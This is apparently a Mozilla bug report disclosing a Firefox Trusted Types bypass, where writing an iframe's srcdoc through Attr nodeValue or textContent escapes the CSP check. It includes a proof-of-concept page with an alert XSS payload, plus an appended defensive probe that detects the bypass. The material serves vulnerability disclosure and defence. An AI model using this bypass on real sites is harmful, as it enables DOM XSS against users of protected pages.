Bug 2003451 Comment 0 Edit History


Summary:
A vulnerability in Mozilla Firefox's implementation of Trusted Types (TT) allows bypassing this critical DOM XSS mitigation feature. The TT security policy fails to block the injection of unsafe HTML when modifying the security-sensitive srcdoc attribute indirectly via its underlying DOM Node properties (nodeValue or textContent). This allows attackers to achieve DOM XSS on websites protected by a strict TT Content Security Policy (CSP), effectively neutralizing the policy's defense against XSS.
Steps To Reproduce:
Create an HTML file with the following code:
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="Content-Security-Policy" content="require-trusted-types-for 'script'; trusted-types 'none';">
</head>
<body>
  <!-- The srcdoc attribute is created by the HTML parser here, so no Trusted Types check applies to it. -->
  <iframe srcdoc="test" id="frame1"></iframe>
  <script>
    // Indirect write through the Attr node. This assignment must be blocked by
    // Trusted Types (plain string into a TrustedHTML sink), but it executes in Firefox.
    frame1.attributes.srcdoc.nodeValue='<img src=x onerror=alert(origin)>';
  </script>
</body>
</html>
```
Open the file in Mozilla Firefox.
Observe that the XSS payload (<img src=x onerror=alert(origin)>) is parsed and executed within the iframe, confirming a TT policy bypass.
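The following probe is an added example, not code from the bug report or from Firefox. It feature-detects, at page load, whether the running browser enforces Trusted Types on the indirect Attr write paths the report describes (nodeValue, textContent), plus Attr.value, which is added here as the Attr node's own setter and is assumed to be covered by the same check. Under the report's CSP a compliant browser throws a TypeError for any plain-string assignment to a TrustedHTML sink, so "no throw and the attribute value changed" is the bypass signal. The function and constant names are hypothetical; the top-level usage expects the report's PoC markup (`<iframe srcdoc="test" id="frame1">`) and is skipped where there is no DOM.

```javascript
// Added example (not from the bug report or Firefox): detect whether the
// browser enforces Trusted Types on indirect Attr writes to srcdoc.
// All names below are hypothetical.

// Indirect ways to write an attribute's value through its Attr node.
// nodeValue and textContent are the two paths from the report; value is
// added here as the Attr node's own setter (assumed to be covered as well).
const INDIRECT_ATTR_SINKS = ['nodeValue', 'textContent', 'value'];

// Inert marker: even if it lands in srcdoc it renders nothing and runs nothing.
const PROBE_HTML = '<!-- tt-probe -->';

// Try one indirect write on a single Attr node. A browser that enforces
// Trusted Types on this path throws a TypeError for a plain string under
// `require-trusted-types-for 'script'` with no policy defined.
function probeAttrSink(attr, prop) {
  const before = attr.value;
  let threw = null;
  try {
    attr[prop] = PROBE_HTML;
  } catch (e) {
    threw = e && e.name ? e.name : String(e);
  }
  const changed = attr.value !== before;
  if (changed) {
    // Put the original value back through the same path; it accepted a
    // string a moment ago, so this will not throw.
    attr[prop] = before;
  }
  return { prop, enforced: !changed, threw };
}

// Probe every indirect path on one Attr (intended target: the srcdoc Attr of
// an iframe whose attribute came from markup, as in the report's PoC).
function probeAttrSinks(attr) {
  return INDIRECT_ATTR_SINKS.map((prop) => probeAttrSink(attr, prop));
}

// True when at least one indirect path accepted a raw string, i.e. the
// browser behaves the way the report describes.
function hasIndirectBypass(results) {
  return results.some((r) => !r.enforced);
}

// Names of the paths that let a raw string through (useful for logging).
function bypassedPaths(results) {
  return results.filter((r) => !r.enforced).map((r) => r.prop);
}

// Browser usage: run inside a page served with the report's CSP
// (require-trusted-types-for 'script'; trusted-types 'none') that contains
// <iframe srcdoc="test" id="frame1">. Skipped under Node, where there is no DOM.
if (typeof document !== 'undefined') {
  const frame = document.getElementById('frame1');
  if (frame && frame.attributes.srcdoc) {
    const results = probeAttrSinks(frame.attributes.srcdoc);
    console.log(
      hasIndirectBypass(results)
        ? 'TT bypass present via: ' + bypassedPaths(results).join(', ')
        : 'TT enforced on all indirect Attr paths',
      results
    );
  }
}
```

A site that relies on Trusted Types can run this once at startup and, if `hasIndirectBypass` is true, treat the browser as unprotected (for example, report to its CSP reporting endpoint or refuse to render srcdoc frames from untrusted data). The probe only tells you what the browser does; the code-level fix for an application is still to never assign untrusted strings through `Attr.nodeValue`, `Attr.textContent` or `Attr.value` on a srcdoc attribute.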
Supporting Material/References:
Related Issue: This vulnerability is structurally similar to a previously patched flaw in the Chromium engine:
Chromium Bug: https://issues.chromium.org/issues/40058798
